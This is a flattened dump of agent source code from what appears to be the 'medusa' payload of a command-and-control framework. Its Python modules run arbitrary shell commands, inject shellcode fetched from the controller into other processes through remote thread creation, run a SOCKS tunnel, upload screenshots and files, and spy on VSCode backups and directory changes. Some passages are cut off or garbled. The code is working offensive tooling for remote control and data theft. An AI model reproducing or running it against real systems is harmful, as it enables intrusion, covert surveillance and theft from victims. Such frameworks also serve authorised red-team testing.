Kernel32.IsWow64Process WIN32_PROCESS_TIMES_TICKS_PER_SECOND = 1e7 MAX_PATH = 260 PROCESS_TERMINATE = 0x0001 PROCESS_QUERY_INFORMATION = 0x0400 TOKEN_QUERY = 0x0008 TOKEN_READ = 0x00020008 TOKEN_IMPERSONATE = 0x00000004 TOKEN_QUERY_SOURCE = 0x0010 TOKEN_DUPLICATE = 0x0002 TOKEN_ASSIGN_PRIMARY = 0x0001 ProcessBasicInformation = 0 ProcessDebugPort = 7 ProcessWow64Information = 26 ProcessImageFileName = 27 ProcessBreakOnTermination = 29 STATUS_UNSUCCESSFUL = NTSTATUS(0xC0000001) STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value STATUS_INVALID_HANDLE = NTSTATUS(0xC0000008).value STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value def query_dos_device(drive_letter): chars = 1024 drive_letter = drive_letter p = create_unicode_buffer(chars) if 0 == Kernel32.QueryDosDeviceW(drive_letter, p, chars): pass return p.value def create_drive_mapping(): mappings = {} for letter in (chr(l) for l in range(ord('C'), ord('Z') + 1)): try: letter = u'%s:' % letter mapped = query_dos_device(letter) mappings[mapped] = letter except WindowsError: pass return mappings mappings = create_drive_mapping() def normalise_binpath(path): match = re.match(r'(^\\Device\\[a-zA-Z0-9]+)(\\.*)?$', path) if not match: return f"Cannot convert {path} into a Win32 compatible path" if not match.group(1) in mappings: return None drive = mappings[match.group(1)] if not drive or not match.group(2): return drive return drive + match.group(2) count = 32 while True: ProcessIds = (ctypes.wintypes.DWORD*count)() cb = ctypes.sizeof(ProcessIds) BytesReturned = ctypes.wintypes.DWORD() if EnumProcesses(ctypes.byref(ProcessIds), cb, ctypes.byref(BytesReturned)): if BytesReturned.value0: filename = os.path.basename(ImageFileName.value) process["name"] = filename.decode() process["bin_path"] = normalise_binpath(ImageFileName.value.decode()) CloseHandle(hProcess) processes.append(process) task = [task for task in self.taskings if task["task_id"] == task_id] task[0]["processes"] = processes return json.dumps({ "processes": processes }) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/ps_full.py3 ================================================ def ps_full(self, task_id): import sys, os.path, ctypes, ctypes.wintypes from ctypes import create_unicode_buffer, GetLastError def _check_bool(result, func, args): if not result: raise ctypes.WinError(ctypes.get_last_error()) return args PULONG = ctypes.POINTER(ctypes.wintypes.ULONG) ULONG_PTR = ctypes.wintypes.LPVOID SIZE_T = ctypes.c_size_t NTSTATUS = ctypes.wintypes.LONG PVOID = ctypes.wintypes.LPVOID PROCESSINFOCLASS = ctypes.wintypes.ULONG Psapi = ctypes.WinDLL('Psapi.dll') EnumProcesses = Psapi.EnumProcesses EnumProcesses.restype = ctypes.wintypes.BOOL Kernel32 = ctypes.WinDLL('kernel32.dll') OpenProcess = Kernel32.OpenProcess OpenProcess.restype = ctypes.wintypes.HANDLE CloseHandle = Kernel32.CloseHandle CloseHandle.errcheck = _check_bool IsWow64Process = Kernel32.IsWow64Process GetCurrentProcess = Kernel32.GetCurrentProcess GetCurrentProcess.restype = ctypes.wintypes.HANDLE GetCurrentProcess.argtypes = () ReadProcessMemory = Kernel32.ReadProcessMemory ReadProcessMemory.errcheck = _check_bool ReadProcessMemory.argtypes = ( ctypes.wintypes.HANDLE, ctypes.wintypes.LPCVOID, ctypes.wintypes.LPVOID, SIZE_T, ctypes.POINTER(SIZE_T)) MAX_PATH = 260 PROCESS_VM_READ = 0x0010 PROCESS_QUERY_INFORMATION = 0x0400 ProcessBasicInformation = 0 ProcessDebugPort = 7 ProcessWow64Information = 26 ProcessImageFileName = 27 ProcessBreakOnTermination = 29 STATUS_UNSUCCESSFUL = NTSTATUS(0xC0000001) STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value STATUS_INVALID_HANDLE = NTSTATUS(0xC0000008).value STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value class RemotePointer(ctypes._Pointer): def __getitem__(self, key): size = None if not isinstance(key, tuple): raise KeyError('must be (index, handle[, size])') if len(key) > 2: index, handle, size = key else: index, handle = key if isinstance(index, slice): raise TypeError('slicing is not supported') dtype = self._type_ offset = ctypes.sizeof(dtype) * index address = PVOID.from_buffer(self).value + offset simple = issubclass(dtype, ctypes._SimpleCData) if simple and size is not None: if dtype._type_ == ctypes.wintypes.WCHAR._type_: buf = (ctypes.wintypes.WCHAR * (size // 2))() else: buf = (ctypes.c_char * size)() else: buf = dtype() nread = SIZE_T() Kernel32.ReadProcessMemory(handle, address, ctypes.byref(buf), \ ctypes.sizeof(buf), ctypes.byref(nread)) if simple: return buf.value return buf _remote_pointer_cache = {} def RPOINTER(dtype): if dtype in _remote_pointer_cache: return _remote_pointer_cache[dtype] name = 'RP_%s' % dtype.__name__ ptype = type(name, (RemotePointer,), {'_type_': dtype}) _remote_pointer_cache[dtype] = ptype return ptype RPWSTR = RPOINTER(ctypes.wintypes.WCHAR) class UNICODE_STRING(ctypes.Structure): _fields_ = (('Length', ctypes.wintypes.USHORT), ('MaximumLength', ctypes.wintypes.USHORT), ('Buffer', RPWSTR)) class LIST_ENTRY(ctypes.Structure): pass RPLIST_ENTRY = RPOINTER(LIST_ENTRY) LIST_ENTRY._fields_ = (('Flink', RPLIST_ENTRY), ('Blink', RPLIST_ENTRY)) class PEB_LDR_DATA(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 8), ('Reserved2', PVOID * 3), ('InMemoryOrderModuleList', LIST_ENTRY)) RPPEB_LDR_DATA = RPOINTER(PEB_LDR_DATA) class RTL_USER_PROCESS_PARAMETERS(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 16), ('Reserved2', PVOID * 10), ('ImagePathName', UNICODE_STRING), ('CommandLine', UNICODE_STRING)) RPRTL_USER_PROCESS_PARAMETERS = RPOINTER(RTL_USER_PROCESS_PARAMETERS) PPS_POST_PROCESS_INIT_ROUTINE = PVOID class PEB(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 2), ('BeingDebugged', ctypes.wintypes.BYTE), ('Reserved2', ctypes.wintypes.BYTE * 1), ('Reserved3', PVOID * 2), ('Ldr', RPPEB_LDR_DATA), ('ProcessParameters', RPRTL_USER_PROCESS_PARAMETERS), ('Reserved4', ctypes.wintypes.BYTE * 104), ('Reserved5', PVOID * 52), ('PostProcessInitRoutine', PPS_POST_PROCESS_INIT_ROUTINE), ('Reserved6', ctypes.wintypes.BYTE * 128), ('Reserved7', PVOID * 1), ('SessionId', ctypes.wintypes.ULONG)) RPPEB = RPOINTER(PEB) class PROCESS_BASIC_INFORMATION(ctypes.Structure): _fields_ = (('Reserved1', PVOID), ('PebBaseAddress', RPPEB), ('Reserved2', PVOID * 2), ('UniqueProcessId', ULONG_PTR), ('InheritedFromUniqueProcessId', ULONG_PTR)) def NtError(status): import sys descr = 'NTSTATUS(%#08x) ' % (status % 2**32,) if status & 0xC0000000 == 0xC0000000: descr += '[Error]' elif status & 0x80000000 == 0x80000000: descr += '[Warning]' elif status & 0x40000000 == 0x40000000: descr += '[Information]' else: descr += '[Success]' if sys.version_info[:2] < (3, 3): return WindowsError(status, descr) return OSError(None, descr, None, status) ntdll = ctypes.WinDLL('ntdll.dll') NtQueryInformationProcess = ntdll.NtQueryInformationProcess NtQueryInformationProcess.restype = NTSTATUS NtQueryInformationProcess.argtypes = ( ctypes.wintypes.HANDLE, PROCESSINFOCLASS, PVOID, ctypes.wintypes.ULONG, PULONG) class ProcessInformation(object): _close_handle = False _closed = False _module_names = None def __init__(self, process_id=None, handle=None): if process_id is None and handle is None: handle = GetCurrentProcess() elif handle is None: handle = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, False, process_id) self._close_handle = True self._handle = handle if not self._query_info() or (process_id is not None \ and self._process_id != process_id): return def __del__(self, CloseHandle=CloseHandle): if self._close_handle and not self._closed: try: CloseHandle(self._handle) except WindowsError as e: pass self._closed = True def _query_info(self): info = PROCESS_BASIC_INFORMATION() handle = self._handle status = NtQueryInformationProcess(handle, ProcessBasicInformation, ctypes.byref(info), ctypes.sizeof(info), None) if status < 0: return False self._process_id = info.UniqueProcessId self._parent_process_id = info.InheritedFromUniqueProcessId self._peb = peb = info.PebBaseAddress[0, handle] self._params = peb.ProcessParameters[0, handle] Is64Bit = ctypes.c_int32() IsWow64Process(handle, ctypes.byref(Is64Bit)) self._arch = "x86" if Is64Bit.value else "x64" @property def process_id(self): return self._process_id @property def session_id(self): return self._peb.SessionId @property def image_path(self): ustr = self._params.ImagePathName return ustr.Buffer[0, self._handle, ustr.Length] @property def command_line(self): ustr = self._params.CommandLine buf = ustr.Buffer[0, self._handle, ustr.Length] return buf processes = [] count = 32 while True: ProcessIds = (ctypes.wintypes.DWORD*count)() cb = ctypes.sizeof(ProcessIds) BytesReturned = ctypes.wintypes.DWORD() if EnumProcesses(ctypes.byref(ProcessIds), cb, ctypes.byref(BytesReturned)): if BytesReturned.value 0: total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0) data = { "action": "post_response", "responses": [ { "task_id": task_id, "total_chunks": total_chunks, "file_path": str(datetime.now()), "chunk_size": CHUNK_SIZE, "is_screenshot": True }] } initial_response = self.postMessageAndRetrieveResponse(data) for i in range(0,total_chunks): if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." if i == total_chunks: content = sh_data[i*CHUNK_SIZE:] else: content = sh_data[i*CHUNK_SIZE:(i+1)*CHUNK_SIZE] data = { "action": "post_response", "responses": [ { "chunk_num": i+1, "file_id": initial_response["responses"][0]["file_id"], "chunk_data": base64.b64encode(content), "task_id": task_id } ] } response = self.postMessageAndRetrieveResponse(data) return json.dumps({ "file_id": initial_response["responses"][0]["file_id"] }) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/shell.py ================================================ def shell(self, task_id, command): import subprocess process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.current_directory, shell=True) stdout, stderr = process.communicate() out = stderr if stderr else stdout return out.decode() ================================================ FILE: Payload_Type/medusa/medusa/agent_code/shinject.py ================================================ def shinject(self, task_id, shellcode, process_id): from ctypes import windll,c_int,byref,c_ulong total_chunks = 1 chunk_num = 0 sc = b"" while (chunk_num < total_chunks): data = { "action": "post_response", "responses": [{ "upload": { "chunk_size": 51200, "file_id": shellcode, "chunk_num": chunk_num+1 }, "task_id": task_id }] } response = self.postMessageAndRetrieveResponse(data) chunk = response["responses"][0] chunk_num+=1 total_chunks = chunk["total_chunks"] sc+=base64.b64decode(chunk["chunk_data"]) PAGE_EXECUTE_READWRITE = 0x00000040 PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF ) VIRTUAL_MEM = ( 0x1000 | 0x2000 ) kernel32 = windll.kernel32 code_size = len(sc) h_process = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(process_id)) if not h_process: return "[!] Error: Couldn't acquire a handle to PID {}".format(process_id) arg_address = kernel32.VirtualAllocEx(h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) kernel32.WriteProcessMemory(h_process, arg_address, sc, code_size, 0) thread_id = c_ulong(0) if not kernel32.CreateRemoteThread(h_process, None, 0, arg_address, None, 0, byref(thread_id)): return "[!] Failed to create thread." return "[*] Remote thread created." ================================================ FILE: Payload_Type/medusa/medusa/agent_code/sleep.py ================================================ def sleep(self, task_id, seconds, jitter=-1): self.agent_config["Sleep"] = int(seconds) if jitter != -1: self.agent_config["Jitter"] = int(jitter) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/socks.py2 ================================================ def socks(self, task_id, action, port): import socket, select from threading import Thread, active_count from struct import pack, unpack from Queue import Queue MAX_THREADS = 200 BUFSIZE = 2048 TIMEOUT_SOCKET = 5 OUTGOING_INTERFACE = "" VER = b'\x05' M_NOAUTH = b'\x00' M_NOTAVAILABLE = b'\xff' CMD_CONNECT = b'\x01' ATYP_IPV4 = b'\x01' ATYP_DOMAINNAME = b'\x03' SOCKS_SLEEP_INTERVAL = 0.1 QUEUE_TIMOUT = 1 def sendSocksPacket(server_id, data, exit_value): self.socks_out.put({ "server_id": server_id, "data": base64.b64encode(data), "exit": exit_value }) def create_socket(): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(TIMEOUT_SOCKET) except: return "Failed to create socket: {}".format(str(err)) return sock def connect_to_dst(dst_addr, dst_port): sock = create_socket() if OUTGOING_INTERFACE: try: sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, OUTGOING_INTERFACE) except PermissionError as err: return 0 try: sock.connect((str(dst_addr), int(dst_port))) return sock except socket.error as err: return 0 def request_client(msg): try: message = base64.b64decode(msg["data"]) s5_request = bytearray(message[:BUFSIZE]) except: return False if (s5_request[0:1] != VER or s5_request[1:2] != CMD_CONNECT or s5_request[2:3] != b'\x00'): return False if s5_request[3:4] == ATYP_IPV4: dst_addr = socket.inet_ntoa(s5_request[4:-2]) dst_port = unpack('>H', s5_request[8:len(s5_request)])[0] elif s5_request[3:4] == ATYP_DOMAINNAME: sz_domain_name = s5_request[4] dst_addr = s5_request[5: 5 + sz_domain_name - len(s5_request)] port_to_unpack = s5_request[5 + sz_domain_name:len(s5_request)] dst_port = unpack('>H', port_to_unpack)[0] else: return False return (dst_addr, dst_port) def create_connection(msg): dst = request_client(msg) rep = b'\x07' bnd = b'\x00' + b'\x00' + b'\x00' + b'\x00' + b'\x00' + b'\x00' if dst: socket_dst = connect_to_dst(dst[0], dst[1]) if not dst or socket_dst == 0: rep = b'\x01' else: rep = b'\x00' bnd = socket.inet_aton(socket_dst.getsockname()[0]) bnd += pack(">H", socket_dst.getsockname()[1]) reply = VER + rep + b'\x00' + ATYP_IPV4 + bnd try: sendSocksPacket(msg["server_id"], reply, msg["exit"]) except: return if rep == b'\x00': return socket_dst def get_running_socks_thread(): return [ t for t in threading.enumerate() if "socks:" in t.name and not task_id in t.name ] def a2m(server_id, socket_dst): while True: if task_id not in [task["task_id"] for task in self.taskings]: return elif [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return if server_id not in self.socks_open.keys(): return try: reader, _, _ = select.select([socket_dst], [], [], 1) except select.error as err: return if not reader: continue try: for sock in reader: data = sock.recv(BUFSIZE) if not data: sendSocksPacket(server_id, b"", True) socket_dst.close() return sendSocksPacket(server_id, data, False) except Exception as e: pass time.sleep(SOCKS_SLEEP_INTERVAL) def m2a(server_id, socket_dst): while True: if task_id not in [task["task_id"] for task in self.taskings]: return elif [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return if server_id not in self.socks_open.keys(): socket_dst.close() return try: if not self.socks_open[server_id].empty(): socket_dst.send(base64.b64decode(self.socks_open[server_id].get(timeout=QUEUE_TIMOUT))) except: pass time.sleep(SOCKS_SLEEP_INTERVAL) t_socks = get_running_socks_thread() if action == "start": if len(t_socks) > 0: return "[!] SOCKS Proxy already running." self.sendTaskOutputUpdate(task_id, "[*] SOCKS Proxy started.\n") while True: if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "[*] SOCKS Proxy stopped." if not self.socks_in.empty(): packet_json = self.socks_in.get(timeout=QUEUE_TIMOUT) if packet_json: server_id = packet_json["server_id"] if server_id in self.socks_open.keys(): if packet_json["data"]: self.socks_open[server_id].put(packet_json["data"]) elif packet_json["exit"]: self.socks_open.pop(server_id) else: if not packet_json["exit"]: if active_count() > MAX_THREADS: sleep(3) continue self.socks_open[server_id] = Queue() sock = create_connection(packet_json) if sock: send_thread = Thread(target=a2m, args=(server_id, sock, ), name="A2M:{}".format(server_id)) recv_thread = Thread(target=m2a, args=(server_id, sock, ), name="M2A:{}".format(server_id)) send_thread.start() recv_thread.start() time.sleep(SOCKS_SLEEP_INTERVAL) else: if len(t_socks) > 0: for t_sock in t_socks: task = [task for task in self.taskings if task["task_id"] == t_sock.name.split(":")[1]][0] task["stopped"] = task["completed"] = True self.socks_open = {} ================================================ FILE: Payload_Type/medusa/medusa/agent_code/socks.py3 ================================================ def socks(self, task_id, action, port): import socket, select, queue from threading import Thread, active_count from struct import pack, unpack MAX_THREADS = 200 BUFSIZE = 2048 TIMEOUT_SOCKET = 5 OUTGOING_INTERFACE = "" VER = b'\x05' M_NOAUTH = b'\x00' M_NOTAVAILABLE = b'\xff' CMD_CONNECT = b'\x01' ATYP_IPV4 = b'\x01' ATYP_DOMAINNAME = b'\x03' SOCKS_SLEEP_INTERVAL = 0.1 QUEUE_TIMOUT = 1 def sendSocksPacket(server_id, data, exit_value): self.socks_out.put({ "server_id": server_id, "data": base64.b64encode(data).decode(), "exit": exit_value }) def create_socket(): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(TIMEOUT_SOCKET) except: return "Failed to create socket: {}".format(str(err)) return sock def connect_to_dst(dst_addr, dst_port): sock = create_socket() if OUTGOING_INTERFACE: try: sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, OUTGOING_INTERFACE.encode()) except PermissionError as err: return 0 try: sock.connect((dst_addr, dst_port)) return sock except socket.error as err: return 0 def request_client(msg): try: message = base64.b64decode(msg["data"]) s5_request = message[:BUFSIZE] except: return False if (s5_request[0:1] != VER or s5_request[1:2] != CMD_CONNECT or s5_request[2:3] != b'\x00'): return False if s5_request[3:4] == ATYP_IPV4: dst_addr = socket.inet_ntoa(s5_request[4:-2]) dst_port = unpack('>H', s5_request[8:len(s5_request)])[0] elif s5_request[3:4] == ATYP_DOMAINNAME: sz_domain_name = s5_request[4] dst_addr = s5_request[5: 5 + sz_domain_name - len(s5_request)] port_to_unpack = s5_request[5 + sz_domain_name:len(s5_request)] dst_port = unpack('>H', port_to_unpack)[0] else: return False return (dst_addr, dst_port) def create_connection(msg): dst = request_client(msg) rep = b'\x07' bnd = b'\x00' + b'\x00' + b'\x00' + b'\x00' + b'\x00' + b'\x00' if dst: socket_dst = connect_to_dst(dst[0], dst[1]) if not dst or socket_dst == 0: rep = b'\x01' else: rep = b'\x00' bnd = socket.inet_aton(socket_dst.getsockname()[0]) bnd += pack(">H", socket_dst.getsockname()[1]) reply = VER + rep + b'\x00' + ATYP_IPV4 + bnd try: sendSocksPacket(msg["server_id"], reply, msg["exit"]) except: return if rep == b'\x00': return socket_dst def get_running_socks_thread(): return [ t for t in threading.enumerate() if "socks:" in t.name and not task_id in t.name ] def a2m(server_id, socket_dst): while True: if task_id not in [task["task_id"] for task in self.taskings]: return elif [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return if server_id not in self.socks_open.keys(): return try: reader, _, _ = select.select([socket_dst], [], [], 1) except select.error as err: return if not reader: continue try: for sock in reader: data = sock.recv(BUFSIZE) if not data: sendSocksPacket(server_id, b"", True) socket_dst.close() return sendSocksPacket(server_id, data, False) except Exception as e: pass time.sleep(SOCKS_SLEEP_INTERVAL) def m2a(server_id, socket_dst): while True: if task_id not in [task["task_id"] for task in self.taskings]: return elif [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return if server_id not in self.socks_open.keys(): socket_dst.close() return try: if not self.socks_open[server_id].empty(): socket_dst.send(base64.b64decode(self.socks_open[server_id].get(timeout=QUEUE_TIMOUT))) except: pass time.sleep(SOCKS_SLEEP_INTERVAL) t_socks = get_running_socks_thread() if action == "start": if len(t_socks) > 0: return "[!] SOCKS Proxy already running." self.sendTaskOutputUpdate(task_id, "[*] SOCKS Proxy started.\n") while True: if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "[*] SOCKS Proxy stopped." if not self.socks_in.empty(): packet_json = self.socks_in.get(timeout=QUEUE_TIMOUT) if packet_json: server_id = packet_json["server_id"] if server_id in self.socks_open.keys(): if packet_json["data"]: self.socks_open[server_id].put(packet_json["data"]) elif packet_json["exit"]: self.socks_open.pop(server_id) else: if not packet_json["exit"]: if active_count() > MAX_THREADS: sleep(3) continue self.socks_open[server_id] = queue.Queue() sock = create_connection(packet_json) if sock: send_thread = Thread(target=a2m, args=(server_id, sock, ), name="a2m:{}".format(server_id)) recv_thread = Thread(target=m2a, args=(server_id, sock, ), name="m2a:{}".format(server_id)) send_thread.start() recv_thread.start() time.sleep(SOCKS_SLEEP_INTERVAL) else: if len(t_socks) > 0: for t_sock in t_socks: task = [task for task in self.taskings if task["task_id"] == t_sock.name.split(":")[1]][0] task["stopped"] = task["completed"] = True self.socks_open = {} ================================================ FILE: Payload_Type/medusa/medusa/agent_code/spawn_jxa.py ================================================ def spawn_jxa(self, task_id, file, language): import os import subprocess total_chunks = 1 chunk_num = 0 cmd_code = "" while (chunk_num < total_chunks): if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." data = { "action": "post_response", "responses": [ { "upload": { "chunk_size": CHUNK_SIZE, "file_id": file, "chunk_num": chunk_num+1 }, "task_id": task_id } ]} response = self.postMessageAndRetrieveResponse(data) chunk = response["responses"][0] chunk_num+=1 total_chunks = chunk["total_chunks"] cmd_code += base64.b64decode(chunk["chunk_data"]).decode() if cmd_code: args = [] if language == "JavaScript": args = ["osascript", "-l", "JavaScript", "-"] elif language == "AppleScript": args = ["osascript", "-"] osapipe = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) osapipe.stdin.write(cmd_code.encode()) stdout, stderr = osapipe.communicate() out = stderr if stderr else stdout return str(out) else: return "Failed to load script" ================================================ FILE: Payload_Type/medusa/medusa/agent_code/unload.py ================================================ def unload(self, task_id, command): try: getattr(medusa, command) except: return "{} not currently loaded.".format(command) delattr(medusa, command) cmd_list = [{"action": "remove", "cmd": command}] responses = [{ "task_id": task_id, "user_output": "Unloaded command: {}".format(command), "commands": cmd_list, "completed": True }] message = { "action": "post_response", "responses": responses } response_data = self.postMessageAndRetrieveResponse(message) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/unload_module.py ================================================ def unload_module(self, task_id, module_name): if module_name in self._meta_cache: finder = self._meta_cache.pop(module_name) sys.meta_path.remove(finder) self.moduleRepo.pop(module_name) return "{} module unloaded".format(module_name) else: return "{} not found in loaded modules".format(module_name) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/upload.py ================================================ def upload(self, task_id, file, remote_path): total_chunks = 1 chunk_num = 1 file_path = remote_path if remote_path[0] == os.sep \ else os.path.join(self.current_directory, remote_path) with open(file_path, "wb") as f: while chunk_num < total_chunks + 1: if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." data = { "action": "post_response", "responses": [ { "upload": { "chunk_size": CHUNK_SIZE, "file_id": file, "chunk_num": chunk_num, "full_path": file_path }, "task_id": task_id } ] } response = self.postMessageAndRetrieveResponse(data) chunk = response["responses"][0] chunk_num+=1 total_chunks = chunk["total_chunks"] f.write(base64.b64decode(chunk["chunk_data"])) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/vscode_list_recent.py ================================================ def vscode_list_recent(self, task_id, db=""): import os, sqlite3, json path = db if db else "/Users/{}/Library/Application Support/Code/User/globalStorage/state.vscdb".format(os.environ["USER"]) recent_files = [] if not os.path.exists(path): return "VSCode State database path does not exist!" with sqlite3.connect(path) as con: for row in con.execute('SELECT * FROM "ItemTable" WHERE KEY = "history.recentlyOpenedPathsList"'): data = json.loads(row[1]) for entry in data["entries"]: recent_file = {} if "folderUri" in entry: recent_file["path"] = entry["folderUri"].replace("file://", "") recent_file["type"] = "folder" elif "fileUri" in entry: recent_file["path"] = entry["fileUri"].replace("file://", "") recent_file["type"] = "file" recent_files.append(recent_file) return json.dumps({ "recents": recent_files }) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/vscode_open_edits.py ================================================ def vscode_open_edits(self, task_id, backups_path=""): import os, json import time path = backups_path if backups_path else "/Users/{}/Library/Application Support/Code/Backups".format(os.environ["USER"]) if not os.path.exists(path): return "VSCode backups folder does not exist!" open_edits = [] for root, dirs, files in os.walk(path): for file in files: if file != ".DS_Store" and file != "workspaces.json": open_edit = {} path = os.path.join(root, file) with open(path, "r") as f: file_content = f.readlines() json_data = json.loads("{" + file_content[0].split("{")[1].rstrip()) if os.path.basename(root) == "untitled": open_edit["backup"] = path open_edit["original"] = file_content[0].split("{")[0].replace("untitled:","").rstrip() open_edit["size"] = "" open_edit["mtime"] = "" open_edit["ctime"] = "" open_edit["type"] = "New" else: open_edit["backup"] = path open_edit["original"] = file_content[0].split("{")[0].replace("file://","").rstrip() open_edit["size"] = f"{json_data['size']} B" open_edit["mtime"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(json_data["mtime"]/1000)) open_edit["ctime"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(json_data["ctime"]/1000)) open_edit["type"] = "Edit" open_edits.append(open_edit) return json.dumps({ "edits" : open_edits }) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/vscode_watch_edits.py ================================================ def vscode_watch_edits(self, task_id, backups_path="", seconds=1): import hashlib, time, os, json known_files = {} def getOriginalFileDetails(path): with open(path, "r") as f: file_content = f.readlines() json_data = json.loads("{" + file_content[0].split("{")[1].rstrip()) return ( file_content[0].split("{")[0].replace("untitled:","").replace("file://","").rstrip(), json_data["size"], time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(json_data["mtime"]/1000)) ) def diffFolder(file_path, print_out=True): for root, dirs, files in os.walk(file_path): for dir in dirs: full_dir_path = os.path.join(root, dir) if full_dir_path not in known_files.keys(): if print_out: self.sendTaskOutputUpdate(task_id,"\n\n[*] New Directory: {}".format(full_dir_path) ) known_files[full_dir_path] = "" for file in files: full_file_path = os.path.join(root, file) file_size = 0 try: with open(full_file_path, "rb") as in_f: file_data = in_f.read() file_size = len(file_data) except: continue hash = hashlib.md5(file_data).hexdigest() if full_file_path not in known_files.keys() and hash not in known_files.values(): if print_out: original_file_path, size, modified_time = getOriginalFileDetails(full_file_path) self.sendTaskOutputUpdate(task_id,"\n\n[*] New File: \n - Backup File: {} ({} bytes) \n - Original File: {} ({} bytes) - Last Modified: {}".format( full_file_path, file_size, original_file_path, size, modified_time)) known_files[full_file_path] = hash elif full_file_path in known_files.keys() and hash not in known_files.values(): if print_out: original_file_path, size, modified_time = getOriginalFileDetails(full_file_path) self.sendTaskOutputUpdate(task_id,"\n\n[*] File Updated: \n - Backup File: {} ({} bytes) \n - Original File: {} ({} bytes) - Last Modified: {}".format( full_file_path, file_size, original_file_path, size, modified_time)) known_files[full_file_path] = hash elif full_file_path not in known_files.keys() and hash in known_files.values(): orig_file = [f for f,h in known_files.items() if h == hash][0] if os.path.exists(os.path.join(file_path, orig_file)): if print_out: self.sendTaskOutputUpdate(task_id,"\n\n[*] Copied File: {}->{} - {} bytes ({})".format(orig_file, full_file_path, file_size, hash)) else: if print_out: self.sendTaskOutputUpdate(task_id,"\n\n[*] Moved File: {}->{} - {} bytes ({})".format(orig_file, full_file_path, file_size, hash)) known_files.pop(orig_file) known_files[full_file_path] = hash for file in list(known_files): if not os.path.isdir(os.path.dirname(file)): for del_file in [f for f in list(known_files) if f.startswith(os.path.dirname(file))]: obj_type = "Directory" if not known_files[del_file] else "File" if file in list(known_files): if print_out: self.sendTaskOutputUpdate(task_id,"\n\n[*] {} deleted: {} {}".format(obj_type, \ del_file, "({})".format(known_files[del_file]) if known_files[del_file] else "")) known_files.pop(file) else: if os.path.basename(file) not in os.listdir(os.path.dirname(file)): obj_type = "Directory" if not known_files[file] else "File" if print_out: self.sendTaskOutputUpdate(task_id,"\n\n[*] {} Deleted: {} {}".format(obj_type, file, \ "({})".format(known_files[file]) if known_files[file] else "")) known_files.pop(file) path = backups_path if backups_path else "/Users/{}/Library/Application Support/Code/Backups".format(os.environ["USER"]) if not os.path.isdir(path): return "[!] Path must be a valid directory" elif not os.access(path, os.R_OK): return "[!] Path not accessible" else: self.sendTaskOutputUpdate(task_id, "[*] Starting directory watch for {}".format(path)) diffFolder(path, False) while(True): if not os.path.exists(path): return "[!] Root directory has been deleted." diffFolder(path) time.sleep(seconds) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/watch_dir.py ================================================ def watch_dir(self, task_id, path, seconds): import hashlib known_files = {} def diffFolder(file_path, print_out=True): for root, dirs, files in os.walk(file_path): for dir in dirs: full_dir_path = os.path.join(root, dir) if full_dir_path not in known_files.keys(): if print_out: self.sendTaskOutputUpdate(task_id, "\n[*] New Directory: {}".format(full_dir_path) ) known_files[full_dir_path] = "" for file in files: full_file_path = os.path.join(root, file) file_size = 0 try: with open(full_file_path, "rb") as in_f: file_data = in_f.read() file_size = len(file_data) except: continue hash = hashlib.md5(file_data).hexdigest() if full_file_path not in known_files.keys() and hash not in known_files.values(): if print_out: self.sendTaskOutputUpdate(task_id, "\n[*] New File: {} - {} bytes ({})".format(full_file_path, file_size, hash)) known_files[full_file_path] = hash elif full_file_path in known_files.keys() and hash not in known_files.values(): if print_out: self.sendTaskOutputUpdate(task_id, "\n[*] File Updated: {} - {} bytes ({})".format(full_file_path, file_size, hash)) known_files[full_file_path] = hash elif full_file_path not in known_files.keys() and hash in known_files.values(): orig_file = [f for f,h in known_files.items() if h == hash][0] if os.path.exists(os.path.join(file_path, orig_file)): if print_out: self.sendTaskOutputUpdate(task_id, "\n[*] Copied File: {}->{} - {} bytes ({})".format(orig_file, full_file_path, file_size, hash)) else: if print_out: self.sendTaskOutputUpdate(task_id, "\n[*] Moved File: {}->{} - {} bytes ({})".format(orig_file, full_file_path, file_size, hash)) known_files.pop(orig_file) known_files[full_file_path] = hash for file in list(known_files): if not os.path.isdir(os.path.dirname(file)): for del_file in [f for f in list(known_files) if f.startswith(os.path.dirname(file))]: obj_type = "Directory" if not known_files[del_file] else "File" if file in list(known_files): if print_out: 